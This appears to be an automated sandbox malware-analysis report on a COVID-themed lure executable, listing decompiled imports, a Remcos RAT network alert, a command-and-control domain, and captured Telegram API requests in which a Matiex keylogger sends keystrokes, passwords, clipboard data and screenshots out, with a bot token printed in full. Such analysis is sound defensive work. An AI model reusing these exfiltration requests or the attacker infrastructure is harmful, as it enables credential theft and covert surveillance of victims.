Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs 28_2_00402C45
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 28_2_0040BC9B
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all 28_2_00403183
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose, 28_2_0040F234
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_00405AFB
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_004057B6

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025637 ET TROJAN Remcos RAT Checkin 23 192.168.2.5:49777 -> 91.193.75.202:40401
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe DNS query: name: checkip.dyndns.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: tobi12345.hopto.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.app
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.app
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768030b76e62Host: api.telegram.orgContent-Length: 749Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680311208c1Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680313f54cfHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768031657ce9Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768031a37799Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768031fe11b2Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680321d1006Host: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768032c3f656Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803301f0f4Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803363b60fHost: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680338c3a23Host: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768033b00042Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768033dfab52Host: api.telegram.orgContent-Length: 828602
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803436e938Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d976803458492fHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768034774736Host: api.telegram.orgContent-Length: 749
